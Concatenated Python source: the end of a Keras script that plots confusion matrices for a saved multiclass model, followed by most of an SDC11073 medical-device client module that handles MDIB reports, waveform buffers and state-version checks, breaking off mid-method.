'~/Machine-Learning/arrays/x_test_fold{}.npy'.format(FOLD)) y_test = np.load( '~/Machine-Learning/arrays/y_test_fold{}.npy'.format(FOLD)) # load model from keras.models import load_model model = load_model( '~/Machine-Learning/fold{}_multiclass_model.h5'.format(FOLD)) # preprocessing from sklearn import preprocessing scaler = preprocessing.StandardScaler().fit(x_test) x_test_scaled = scaler.transform(x_test) # predicted probabilities for the test set Yp = model.predict(x_test_scaled, verbose=1) # to label yp = np.argmax(Yp, axis=-1) y_test = np.argmax(y_test, axis=-1) import itertools from sklearn.metrics import confusion_matrix def plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.viridis): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) fmt = '.2f' if normalize else 'd' thresh = cm.max() / 2. for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, format(cm[i, j], fmt), horizontalalignment="center", color="white" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') # Compute confusion matrix cnf_matrix = confusion_matrix(y_test, yp) np.set_printoptions(precision=2) # Plot non-normalized confusion matrix plt.figure() plot_confusion_matrix(cnf_matrix, classes=config["classes"], title='Confusion matrix, without normalization') # Plot normalized confusion matrix plt.figure() plot_confusion_matrix(cnf_matrix, classes=config["classes"], normalize=True, title='Normalized confusion matrix') plt.show() deichmab-draeger/sdc11073-1 import traceback import time from threading import Lock from collections import deque from collections import namedtuple from statistics import mean, stdev import copy from lxml import etree as etree_ from .. import observableproperties as properties from . import mdibbase from . import msgreader from .. import namespaces from .. import pmtypes from concurrent import futures from .. import loghelper _global_nsmap = namespaces.nsmap PROFILING = False if PROFILING: import cProfile import pstats from io import StringIO LOG_WF_AGE_INTERVAL = 30 # how often a log message is written with mean and stdef of waveforms age AGE_CALC_SAMPLES_COUNT = 100 # amount of data for wf mean age and stdev calculation A_NO_LOG = 0 A_OUT_OF_RANGE = 1 A_STILL_OUT_OF_RANGE = 2 A_BACK_IN_RANGE = 3 class DeterminationTimeWarner: """A Helper to reduce log warnings regarding determination time.""" ST_IN_RANGE = 0 ST_OUT_OF_RANGE = 1 result_lookup = { # (last, current) : (action, shall_repeat) (ST_IN_RANGE, ST_IN_RANGE): (A_NO_LOG, False), (ST_IN_RANGE, ST_OUT_OF_RANGE): (A_OUT_OF_RANGE, False), (ST_OUT_OF_RANGE, ST_OUT_OF_RANGE): (A_STILL_OUT_OF_RANGE, True), (ST_OUT_OF_RANGE, ST_IN_RANGE): (A_BACK_IN_RANGE, False) } def __init__(self, repeat_period=30): self.repeat_period = repeat_period self._last_log_time = 0 self.last_state = self.ST_IN_RANGE def getOutOfDeterminationTimeLogState(self, minAge, maxAge, warn_limit): ''' @return: one of above constants ''' now = time.time() if minAge < -warn_limit or maxAge > warn_limit: current_state = self.ST_OUT_OF_RANGE else: current_state = self.ST_IN_RANGE action, shall_repeat = self.result_lookup[(self.last_state, current_state)] if self.last_state != current_state: # a state transition self.last_state = current_state self._last_log_time = now return action else: # no state transition, but might need repeated logging if shall_repeat and now - self._last_log_time >= self.repeat_period: self._last_log_time = now return action else: return A_NO_LOG _AgeData = namedtuple('_AgeData', 'mean_age stdev min_age max_age') class ClientRtBuffer(object): '''Collects data of one real time stream.''' def __init__(self, sample_period, max_samples): ''' @param sample_period: float value, in seconds. When an incoming real time sample array is split into single RtSampleContainers, this is used to calculate the individual time stamps. Value can be zero if correct value is not known. In this case all Containers will have the observation time of the sample array. @param max_samples: integer, max. length of self.rtdata ''' self.rt_data = deque(maxlen=max_samples) self.sample_period = sample_period self._max_samples = max_samples self._logger = loghelper.getLoggerAdapter('sdc.client.mdib.rt') self._lock = Lock() self.last_sc = None # last statecontainer that was handled self._age_of_data_list = deque(maxlen=AGE_CALC_SAMPLES_COUNT) # used to calculate average age of samples when received self._reported_min_age = None self._reported_max_age = None def mkRtSampleContainers(self, realtimeSampleArrayContainer): ''' :param realtimeSampleArrayContainer: a RealTimeSampleArrayMetricStateContainer instance :return: a list of mdibbase.RtSampleContainer ''' self.last_sc = realtimeSampleArrayContainer metricValue = realtimeSampleArrayContainer.metricValue if metricValue is None: # this can happen if metric state is not activated. self._logger.debug('real time sample array "{} "has no metric value, ignoring it', realtimeSampleArrayContainer.descriptorHandle) return [] observationTime = metricValue.DeterminationTime annotations = metricValue.Annotations applyAnnotations = metricValue.ApplyAnnotations rtSampleContainers = [] if metricValue.Samples is not None: for i, sample in enumerate(metricValue.Samples): appliedAnnotations = [] if applyAnnotations is not None: for aa in applyAnnotations: if aa.SampleIndex == i: # there is an annotation for this sample: aIndex = aa.AnnotationIndex annot = annotations[aIndex] # index is zero-based appliedAnnotations.append(annot) t = observationTime + i * self.sample_period rtSampleContainers.append(mdibbase.RtSampleContainer(sample, t, metricValue.Validity, appliedAnnotations)) return rtSampleContainers def addRtSampleContainers(self, sc): if not sc: return with self._lock: self.rt_data.extend(sc) self._age_of_data_list.append(time.time() - sc[-1].observationTime) # use time of youngest sample, this is the best value for indication of delays try: self._reported_min_age = min(self._age_of_data_list[-1], self._reported_min_age) except TypeError: self._reported_min_age = self._age_of_data_list[-1] try: self._reported_max_age = max(self._age_of_data_list[-1], self._reported_min_age) except TypeError: self._reported_max_age = self._age_of_data_list[-1] def readData(self): ''' This read method consumes all data in buffer. @return: a list of RtSampleContainer objects''' with self._lock: ret = copy.copy(self.rt_data) self.rt_data.clear() return ret def get_age_stdev(self): with self._lock: min_value, self._reported_min_age = self._reported_min_age, None max_value, self._reported_max_age = self._reported_max_age, None mean_data = 0 if len(self._age_of_data_list) == 0 else mean(self._age_of_data_list) std_deviation = 0 if len(self._age_of_data_list) < 2 else stdev(self._age_of_data_list) return _AgeData(mean_data, std_deviation, min_value or 0, max_value or 0) _BufferedNotification = namedtuple('_BufferedNotification', 'report handler') class ClientMdibContainer(mdibbase.MdibContainer): ''' This mdib is meant to be read-only. Only update source is a BICEPSClient.''' DETERMINATIONTIME_WARN_LIMIT = 1.0 # in seconds MDIB_VERSION_CHECK_DISABLED = False # for testing purpose you can disable checking of mdib version, so that every notification is accepted. INITIAL_NOTIFICATION_BUFFERING = True # if False, the response for the first incoming notification is answered after the getmdib is done. # if True, first notifications are buffered and the responses are sent immediately. def __init__(self, sdcClient, maxRealtimeSamples=100): super(ClientMdibContainer, self).__init__(sdcClient.sdc_definitions) self._logger = loghelper.getLoggerAdapter('sdc.client.mdib', sdcClient.log_prefix) self._sdcClient = sdcClient if self.bicepsSchema is None: raise RuntimeError('no bicepsSchema instance') self._isInitialized = False self.rtBuffers = {} # key is a handle, value is a ClientRtBuffer self._maxRealtimeSamples = maxRealtimeSamples self._last_wf_age_log = time.time() if PROFILING: self.pr = cProfile.Profile() self._contextMdibVersion = None self._msgReader = msgreader.MessageReader(self) # a buffer for notifications that are received before initial getmdib is done self._bufferedNotifications = list() self._bufferedNotificationsLock = Lock() self.waveform_time_warner = DeterminationTimeWarner() self.metric_time_warner = DeterminationTimeWarner() def initMdib(self): if self._isInitialized: raise RuntimeError('ClientMdibContainer is already initialized') # first start receiving notifications, then call getMdib. # Otherwise we might miss notifications. self._bindToObservables() getService = self._sdcClient.client('Get') self._logger.info('initializing mdib...') mdibNode = getService.getMdibNode() self.nsmapper.useDocPrefixes(mdibNode.nsmap) self._logger.info('creating description containers...') descriptorContainers = self._msgReader.readMdDescription(mdibNode) with self.descriptions._lock: #pylint: disable=protected-access self.descriptions.clear() self.addDescriptionContainers(descriptorContainers) self._logger.info('creating state containers...') self.clearStates() stateContainers = self._msgReader.readMdState(mdibNode) self.addStateContainers(stateContainers) mdibVersion = mdibNode.get('MdibVersion') sequenceId = mdibNode.get('SequenceId') if mdibVersion is not None: self.mdibVersion = int(mdibVersion) self._logger.info('setting initial mdib version to {}', mdibVersion) else: self._logger.warn('found no mdib version in GetMdib response, assuming "0"') self.mdibVersion = 0 self.sequenceId = sequenceId self._logger.info('setting sequence Id to {}', sequenceId) # retrieve context states only if there were none in mdibNode if len(self.contextStates.objects) == 0: self._getContextStates() else: self._logger.info('found context states in GetMdib Result, will not call getContextStates') # process buffered notifications with self._bufferedNotificationsLock: for bufferedReport in self._bufferedNotifications: bufferedReport.handler(bufferedReport.report, is_buffered_report=True) del self._bufferedNotifications[:] self._isInitialized = True self._sdcClient._register_mdib(self) #pylint: disable=protected-access self._logger.info('initializing mdib done') def _bufferNotification(self, report, callable): ''' write notification to an temporary buffer, as long as mdib is not initialized :param report: the report :param callable: the mothod that shall be called later for delayed handling of report :return: True if buffered, False if report shall be processed immediately ''' if self._isInitialized: # no reason to buffer return False if not self.INITIAL_NOTIFICATION_BUFFERING: self._waitUntilInitialized(callable.__name__) return False # get lock and check if we need to write to buffer with self._bufferedNotificationsLock: if not self._isInitialized: self._bufferedNotifications.append(_BufferedNotification(report, callable)) return True return False def syncContextStates(self): '''This method requests all context states from device and deletes all local context states that are not available in response from Device.''' try: self._logger.info('syncContextStates called') contextService = self._sdcClient.client('Context') responseNode = contextService.getContextStatesNode() self._logger.info('creating context state containers...') contextStateContainers = self._msgReader.readContextState(responseNode) devices_contextStateHandles = [s.Handle for s in contextStateContainers] with self.contextStates._lock: # pylint: disable=protected-access for obj in self.contextStates.objects: if obj.Handle not in devices_contextStateHandles: self.contextStates.removeObjectNoLock((obj)) except: self._logger.error(traceback.format_exc()) def _getContextStates(self, handles = None): try: self._logger.debug('new Query, handles={}', handles) time.sleep(0.001) contextService = self._sdcClient.client('Context') self._logger.info('requesting context states...') responseNode = contextService.getContextStatesNode(handles) self._logger.info('creating context state containers...') contextStateContainers = self._msgReader.readContextState(responseNode) self._contextMdibVersion = int(responseNode.get('MdibVersion', '0')) self._logger.debug('_getContextStates: setting _contextMdibVersion to {}', self._contextMdibVersion) self._logger.debug('got {} context states', len(contextStateContainers)) with self.contextStates._lock: #pylint: disable=protected-access for stateContainer in contextStateContainers: oldStateContainers = self.contextStates.handle.get(stateContainer.Handle, []) if len(oldStateContainers) == 0: self.contextStates.addObjectNoLock(stateContainer) self._logger.debug('new ContextState {}', stateContainer) elif len(oldStateContainers) == 1: oldStateContainer = oldStateContainers[0] if oldStateContainer.StateVersion != stateContainer.StateVersion: self._logger.debug('update {} ==> {}', oldStateContainer, stateContainer) oldStateContainer.updateFromNode(stateContainer.node) self.contextStates.updateObjectNoLock(oldStateContainer) else: old = etree_.tostring(oldStateContainer.node) new = etree_.tostring(stateContainer.node) if old == new: self._logger.debug('no update {}', oldStateContainer.node) else: self._logger.error('no update but different!\n{ \n{}', lambda:etree_.tostring(oldStateContainer.node), lambda:etree_.tostring(stateContainer.node)) #pylint: disable=cell-var-from-loop else: txt = ', '.join([str(x) for x in oldStateContainers]) self._logger.error('found {} objects: {}', len(oldStateContainers), txt) except: self._logger.error(traceback.format_exc()) finally: self._logger.info('_getContextStates done') def _bindToObservables(self): # observe properties of sdcClient if PROFILING: properties.bind(self._sdcClient, waveFormReport=self._onWaveformReportProfiled) else: properties.bind(self._sdcClient, waveFormReport=self._onWaveformReport) properties.bind(self._sdcClient, episodicMetricReport=self._onEpisodicMetricReport) properties.bind(self._sdcClient, episodicAlertReport=self._onEpisodicAlertReport) properties.bind(self._sdcClient, episodicContextReport=self._onEpisodicContextReport) properties.bind(self._sdcClient, episodicComponentReport=self._onEpisodicComponentReport) properties.bind(self._sdcClient, descriptionModificationReport=self._onDescriptionModificationReport) properties.bind(self._sdcClient, episodicOperationalStateReport=self._onOperationalStateReport) def _canAcceptMdibVersion(self, log_prefix, newMdibVersion): if self.MDIB_VERSION_CHECK_DISABLED: return True if newMdibVersion is None: self._logger.error('{}: could not check MdibVersion!', log_prefix) else: # log deviations from expected mdib versionb if newMdibVersion < self.mdibVersion: self._logger.warn('{}: ignoring too old Mdib version, have {}, got {}', log_prefix, self.mdibVersion, newMdibVersion) elif (newMdibVersion - self.mdibVersion) > 1: if self._sdcClient.all_subscribed: self._logger.warn('{}: expect mdibVersion {}, got {}', log_prefix, self.mdibVersion+1, newMdibVersion) # it is possible to receive multiple notifications with the same mdib version => compare ">=" if newMdibVersion >= self.mdibVersion: return True return False def _updateSequenceId(self, reportNode): sequenceId = reportNode.get('SequenceId') if sequenceId != self.sequenceId: self.sequenceId = sequenceId def _waitUntilInitialized(self, log_prefix): showsuccesslog = False started = time.monotonic() while not self._isInitialized: delay = time.monotonic() - started if 3 >= delay > 1: showsuccesslog = True self._logger.warn('{}: _waitUntilInitialized takes long...', log_prefix) elif delay > 10: raise RuntimeError('_waitUntilInitialized failed') time.sleep(1) delay = time.monotonic() - started if showsuccesslog: self._logger.info('{}: _waitUntilInitialized took {} seconds', log_prefix, delay) def _onEpisodicMetricReport(self, reportNode, is_buffered_report=False): if not is_buffered_report and self._bufferNotification(reportNode, self._onEpisodicMetricReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onEpisodicMetricReport', newMdibVersion): return now = time.time() metricsByHandle = {} maxAge = 0 minAge = 0 statecontainers = self._msgReader.readEpisodicMetricReport(reportNode) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in statecontainers: if sc.descriptorContainer is not None and sc.descriptorContainer.DescriptorVersion != sc.DescriptorVersion: self._logger.warn( '_onEpisodicMetricReport: metric "{}": descriptor version expect "{}", found "{}"', sc.descriptorHandle, sc.DescriptorVersion, sc.descriptorContainer.DescriptorVersion) sc.descriptorContainer = None try: oldStateContainer = self.states.descriptorHandle.getOne(sc.descriptorHandle, allowNone=True) except RuntimeError as ex: self._logger.error('_onEpisodicMetricReport, getOne on states: {}', ex) continue desc_h = sc.descriptorHandle metricsByHandle[desc_h] = sc # metric if oldStateContainer is not None: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'EpisodicMetricReport', is_buffered_report): oldStateContainer.updateFromOtherContainer(sc) self.states.updateObject(oldStateContainer) else: self.states.addObject(sc) if sc.metricValue is not None: observationTime = sc.metricValue.DeterminationTime if observationTime is None: self._logger.warn( '_onEpisodicMetricReport: metric {} version {} has no DeterminationTime', desc_h, sc.StateVersion) else: age = now - observationTime minAge = min(minAge, age) maxAge = max(maxAge, age) shall_log = self.metric_time_warner.getOutOfDeterminationTimeLogState(minAge, maxAge, self.DETERMINATIONTIME_WARN_LIMIT) if shall_log == A_OUT_OF_RANGE: self._logger.warn( '_onEpisodicMetricReport mdibVersion {}: age of metrics outside limit of {} sec.: max, min = {:03f}, {:03f}', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, maxAge, minAge) elif shall_log == A_STILL_OUT_OF_RANGE: self._logger.warn( '_onEpisodicMetricReport mdibVersion {}: age of metrics still outside limit of {} sec.: max, min = {:03f}, {:03f}', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, maxAge, minAge) elif shall_log == A_BACK_IN_RANGE: self._logger.info( '_onEpisodicMetricReport mdibVersion {}: age of metrics back in limit of {} sec.: max, min = {:03f}, {:03f}', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, maxAge, minAge) finally: self.metricsByHandle = metricsByHandle # used by waitMetricMatches method def _onEpisodicAlertReport(self, reportNode, is_buffered_report=False): if not is_buffered_report and self._bufferNotification(reportNode, self._onEpisodicAlertReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onEpisodicAlertReport', newMdibVersion): return alertByHandle = {} allAlertContainers = self._msgReader.readEpisodicAlertReport(reportNode) self._logger.debug('_onEpisodicAlertReport: received {} alerts', len(allAlertContainers)) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in allAlertContainers: if sc.descriptorContainer is not None and sc.descriptorContainer.DescriptorVersion != sc.DescriptorVersion: self._logger.warn( '_onEpisodicAlertReport: alert "{}": descriptor version expect "{}", found "{}"', sc.descriptorHandle, sc.DescriptorVersion, sc.descriptorContainer.DescriptorVersion) sc.descriptorContainer = None try: oldStateContainer = self.states.descriptorHandle.getOne(sc.descriptorHandle, allowNone=True) except RuntimeError as ex: self._logger.error('_onEpisodicAlertReport, getOne on states: {}', ex) continue desc_h = sc.descriptorHandle if oldStateContainer is not None: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'EpisodicAlertReport', is_buffered_report): oldStateContainer.updateFromOtherContainer(sc) self.states.updateObject(oldStateContainer) alertByHandle[oldStateContainer.descriptorHandle] = oldStateContainer else: self.states.addObject(sc) alertByHandle[sc.descriptorHandle] = sc finally: self.alertByHandle = alertByHandle # update observable def _onOperationalStateReport(self, reportNode, is_buffered_report=False): if not is_buffered_report and self._bufferNotification(reportNode, self._onOperationalStateReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onOperationalStateReport', newMdibVersion): return operationByHandle = {} self._logger.info('_onOperationalStateReport: report={}', lambda:etree_.tostring(reportNode)) allOperationStateContainers = self._msgReader.readOperationalStateReport(reportNode) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in allOperationStateContainers: if sc.descriptorContainer is not None and sc.descriptorContainer.DescriptorVersion != sc.DescriptorVersion: self._logger.warn('_onOperationalStateReport: OperationState "{}": descriptor version expect "{}", found "{}"', sc.descriptorHandle, sc.DescriptorVersion, sc.descriptorContainer.DescriptorVersion) sc.descriptorContainer = None try: oldStateContainer = self.states.descriptorHandle.getOne(sc.descriptorHandle, allowNone=True) except RuntimeError as ex: self._logger.error('_onOperationalStateReport, getOne on states: {}', ex) continue desc_h = sc.descriptorHandle if oldStateContainer is not None: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'OperationalStateReport', is_buffered_report): oldStateContainer.updateFromOtherContainer(sc) self.states.updateObject(oldStateContainer) operationByHandle[oldStateContainer.descriptorHandle] = oldStateContainer else: self.states.addObject(sc) operationByHandle[sc.descriptorHandle] = sc finally: self.operationByHandle = operationByHandle def _onWaveformReportProfiled(self, reportNode): self.pr.enable() self._onWaveformReport(reportNode) self.pr.disable() s = StringIO() ps = pstats.Stats(self.pr, stream=s).sort_stats('cumulative') ps.print_stats(30) print (s.getvalue()) print ('total number of states: {}'.format(len(self.states._objects))) #pylint:disable=protected-access print ('total number of objIds: {}'.format(len(self.states._objectIDs))) #pylint:disable=protected-access for name, l in self.states._objectIDs.items(): #pylint:disable=protected-access if len(l) > 50: print ('object {} has {} idx references, {}'.format(name, len(l), l)) def _onWaveformReport(self, reportNode, is_buffered_report=False): #pylint:disable=too-many-locals # reportNode contains a list of msg:State nodes if not is_buffered_report and self._bufferNotification(reportNode, self._onWaveformReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onWaveformReport', newMdibVersion): return waveformByHandle = {} waveformAge = {} # collect age of all waveforms in this report, and make one report if age is above warn limit (instead of multiple) allRtSampleArrayContainers = self._msgReader.readWaveformReport(reportNode) self._logger.debug('_onWaveformReport: {} waveforms received', len(allRtSampleArrayContainers)) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for new_sac in allRtSampleArrayContainers: d_handle = new_sac.descriptorHandle descriptorContainer = new_sac.descriptorContainer if descriptorContainer is None: self._logger.warn('_onWaveformReport: No Descriptor found for handle "{}"', d_handle) oldStateContainer = self.states.descriptorHandle.getOne(d_handle, allowNone=True) if oldStateContainer is None: self.states.addObject(new_sac) current_sc = new_sac else: if self._hasNewStateUsableStateVersion(oldStateContainer, new_sac, 'WaveformReport', is_buffered_report): # update old state container from new one oldStateContainer.updateFromOtherContainer(new_sac) self.states.updateObject(oldStateContainer) current_sc = oldStateContainer # we will need it later waveformByHandle[d_handle] = current_sc # add to Waveform Buffer rtBuffer = self.rtBuffers.get(d_handle) if rtBuffer is None: if descriptorContainer is not None: # read sample period try: sample_period = descriptorContainer.SamplePeriod or 0 except AttributeError: sample_period = 0 # default rtBuffer = ClientRtBuffer(sample_period=sample_period, max_samples=self._maxRealtimeSamples) self.rtBuffers[d_handle] = rtBuffer last_sc = rtBuffer.last_sc rtSampleContainers = rtBuffer.mkRtSampleContainers(new_sac) rtBuffer.addRtSampleContainers(rtSampleContainers) # check age if len(rtSampleContainers) > 0: waveformAge[d_handle] = rtSampleContainers[-1].age # check descriptor version if descriptorContainer.DescriptorVersion != new_sac.DescriptorVersion: self._logger.error('_onWaveformReport: descriptor {}: expect version "{}", found "{}"', d_handle, new_sac.DescriptorVersion, descriptorContainer.DescriptorVersion) if len(waveformAge) > 0: minAge = min(waveformAge.values()) maxAge = max(waveformAge.values()) shall_log = self.waveform_time_warner.getOutOfDeterminationTimeLogState(minAge, maxAge, self.DETERMINATIONTIME_WARN_LIMIT) if shall_log != A_NO_LOG: tmp = ', '.join('"{}":{:.3f}sec.'.format(k, v) for k,v in waveformAge.items()) if shall_log == A_OUT_OF_RANGE: self._logger.warn('_onWaveformReport mdibVersion {}: age of samples outside limit of {} sec.: age={}!', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, tmp) elif shall_log == A_STILL_OUT_OF_RANGE: self._logger.warn('_onWaveformReport mdibVersion {}: age of samples still outside limit of {} sec.: age={}!', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, tmp) elif shall_log == A_BACK_IN_RANGE: self._logger.info('_onWaveformReport mdibVersion {}: age of samples back in limit of {} sec.: age={}', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, tmp) if LOG_WF_AGE_INTERVAL: now = time.time() if now - self._last_wf_age_log >= LOG_WF_AGE_INTERVAL: age_data = self.get_wf_age_stdev() self._logger.info('waveform mean age={:.1f}ms., stdev={:.2f}ms. min={:.1f}ms., max={}', age_data.mean_age*1000., age_data.stdev*1000., age_data.min_age*1000., age_data.max_age*1000.) self._last_wf_age_log = now finally: self.waveformByHandle = waveformByHandle def _onEpisodicContextReport(self, reportNode, is_buffered_report=False): if not is_buffered_report and self._bufferNotification(reportNode, self._onEpisodicContextReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onEpisodicContextReport', newMdibVersion): return contextByHandle = {} stateContainers = self._msgReader.readEpisodicContextReport(reportNode) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in stateContainers: try: oldStateContainer = self.contextStates.handle.getOne(sc.Handle, allowNone=True) except RuntimeError as ex: self._logger.error('_onEpisodicContextReport, getOne on contextStates: {}', ex) continue if oldStateContainer is None: self.contextStates.addObject(sc) self._logger.info( '_onEpisodicContextReport: new context state handle = {} Descriptor Handle={} Assoc={}, Validators={}', sc.Handle, sc.descriptorHandle, sc.ContextAssociation, sc.Validator) contextByHandle[sc.Handle] = sc else: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'EpisodicContextReport', is_buffered_report): self._logger.info( '_onEpisodicContextReport: updated context state handle = {} Descriptor Handle={} Assoc={}, Validators={}', sc.Handle, sc.descriptorHandle, sc.ContextAssociation, sc.Validator) oldStateContainer.updateFromOtherContainer(sc) self.contextStates.updateObject(oldStateContainer) contextByHandle[oldStateContainer.Handle] = oldStateContainer finally: self.contextByHandle = contextByHandle def _onEpisodicComponentReport(self, reportNode, is_buffered_report=False): '''The EpisodicComponentReport is sent if at least one property of at least one component state has changed and SHOULD contain only the changed component states. Components are MDSs, VMDs, Channels. Not metrics and alarms ''' if not is_buffered_report and self._bufferNotification(reportNode, self._onEpisodicComponentReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onEpisodicComponentReport', newMdibVersion): return componentByHandle = {} statecontainers = self._msgReader.readEpisodicComponentReport(reportNode) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in statecontainers: desc_h = sc.descriptorHandle if desc_h is None: self._logger.error('_onEpisodicComponentReport: missing descriptor handle in {}!', lambda: etree_.tostring(sc.node)) # pylint: disable=cell-var-from-loop else: try: oldStateContainer = self.states.descriptorHandle.getOne(desc_h, allowNone=True) except RuntimeError as ex: self._logger.error('_onEpisodicComponentReport, getOne on states: {}', ex) continue if oldStateContainer is None: self.states.addObject(sc) self._logger.info( '_onEpisodicComponentReport: new component state handle = {} DescriptorVersion={}', desc_h, sc.DescriptorVersion) componentByHandle[sc.descriptorHandle] = sc else: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'EpisodicComponentReport', is_buffered_report): self._logger.info( '_onEpisodicComponentReport: updated component state, handle="{}" DescriptorVersion={}', desc_h, sc.DescriptorVersion) oldStateContainer.updateFromOtherContainer(sc) self.states.updateObject(oldStateContainer) componentByHandle[oldStateContainer.descriptorHandle] = oldStateContainer finally: self.componentByHandle = componentByHandle def _onDescriptionModificationReport(self, reportNode, is_buffered_report=False): '''The DescriptionModificationReport is sent if at least one Descriptor has been created, updated or deleted during runtime. It consists of 1...n DescriptionModificationReportParts. ''' if not is_buffered_report and self._bufferNotification(reportNode, self._onDescriptionModificationReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onDescriptionModificationReport', newMdibVersion): return descriptions_lookup_list = self._msgReader.readDescriptionModificationReport(reportNode) with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for descriptions_lookup in descriptions_lookup_list: newDescriptorByHandle = {} updatedDescriptorByHandle = {} # -- new -- newDescriptorContainers, stateContainers = descriptions_lookup[pmtypes.DescriptionModificationTypes.CREATE] for dc in newDescriptorContainers: self.descriptions.addObject(dc) self._logger.debug('_onDescriptionModificationReport: created description "{}" (parent="{}")', dc.handle, dc.parentHandle) newDescriptorByHandle[dc.handle] = dc for sc in stateContainers: # determine multikey if sc.isContextState: multikey = self.contextStates else: multikey = self.states multikey.addObject(sc) # -- deleted -- deletedDescriptorContainers, stateContainers = descriptions_lookup[pmtypes.DescriptionModificationTypes.DELETE] for dc in deletedDescriptorContainers: self._logger.debug('_onDescriptionModificationReport: remove descriptor "{}" (parent="{}")', dc.handle, dc.parentHandle) self.rmDescriptorHandleAll(dc.handle) # handling of self.deletedDescriptorByHandle inside called method # -- updated -- updatedDescriptorContainers, stateContainers = descriptions_lookup[pmtypes.DescriptionModificationTypes.UPDATE] for dc in updatedDescriptorContainers: self._logger.info('_onDescriptionModificationReport: update descriptor "{}" (parent="{}")', dc.handle, dc.parentHandle) container = self.descriptions.handle.getOne(dc.handle, allowNone=True) if container is None: pass else: container.updateDescrFromNode(dc.node) updatedDescriptorByHandle[dc.handle] = dc for sc in stateContainers: # determine multikey if sc.isContextState: multikey = self.contextStates oldstateContainer = multikey.handle.getOne(sc.Handle, allowNone=True) else: multikey = self.states oldstateContainer = multikey.descriptorHandle.getOne(sc.descriptorHandle, allowNone=True) if oldstateContainer is not None: oldstateContainer.updateFromOtherContainer(sc) multikey.updateObject(oldstateContainer) # write observables for every report part separately if newDescriptorByHandle: self.newDescriptorByHandle = newDescriptorByHandle if updatedDescriptorByHandle: self.updatedDescriptorByHandle = updatedDescriptorByHandle def _hasNewStateUsableStateVersion(self, oldStateContainer, newStateContainer, reportName, is_buffered_report): ''' compare state versions old vs new :param oldStateContainer: :param newStateContainer: :param reportName: used for logging :return: True if new state is ok for mdib , otherwise False ''' diff = int(newStateContainer.StateVersion) - int(oldStateContainer.StateVersion) # diff == 0 can happen if there is only a descriptor version update if diff == 1: # this is the perfect version return True elif diff > 1: self._logger.error('{}: missed {} states for state DescriptorHandle={} ({}->{})', reportName, diff - 1, oldStateContainer.descriptorHandle, oldStateContainer.StateVersion, newStateContainer.StateVersion) return True # the new version is newer, therefore it can be added to mdib elif diff < 0: if not is_buffered_report: self._logger.error( '{}: reduced state version for state DescriptorHandle={} ({}->{}) ', reportName, oldStateContainer.descriptorHandle, oldStateContainer.StateVersion, newStateContainer.StateVersion) return False else: # diff == 0: diffs = oldStateContainer.diff(newStateContainer) # compares all xml attributes if diffs: self._logger.error( '{}: repeated state version {} for state DescriptorHandle={}, but states have different data:{}', reportName, oldStateContainer.StateVersion, oldStateContainer.descriptorHandle, diffs) return False def waitMetricMatches(self, handle, matchesfunc, timeout): ''' wait until a matching metric has been received. The matching is defined by the handle of the metric and the result of a matching function. If the matching function returns true, this function returns. @param handle: The handle string of the metric of interest. @param matchesfunc: a callable, argument is the current state with matching handle. Can be None, in that case every state matches Example: expected = 42 def isMatchingValue(state): found = state.xpath('dom:MetricValue/@Value', namespaces=nsmap) # returns a list of values, empty if nothing matches if found: found[0] = int(found[0]) return [expected] == found @param timeout: timeout in seconds @return: the matching state. In cas of a timeout it raises a TimeoutError exception. ''' fut = futures.Future() # define a callback function that sets value of fut def onMetricsByHandle(metricsByHandle): metric = metricsByHandle.get(handle) if metric is not None: if matchesfunc is None or matchesfunc(metric): fut.set_result(metric) try: properties.bind(self, metricsByHandle = onMetricsByHandle) begin = time.monotonic() ret = fut.result(timeout) self._logger.debug('waitMetricMatches: got result after {:.2f} seconds', time.monotonic() - begin) return ret finally: properties.unbind(self, metricsByHandle = onMetricsByHandle) def mkProposedState(self, descriptorHandle, copyCurrentState=True, handle=None): ''' Create a new state that can be used as proposed state in according operations. The new state is not part of mdib! :param descriptorHandle: the descriptor :param copyCurrentState: if True, all members of existing state will be copied to new state :param handle: if this is a multi state class, then this is the handle of the existing state that shall be used for copy. :return: ''' descr = self.descriptions.handle.getOne(descriptorHandle) new_state = self.mkStateContainerFromDescriptor(descr) if copyCurrentState: lookup = self.contextStates if 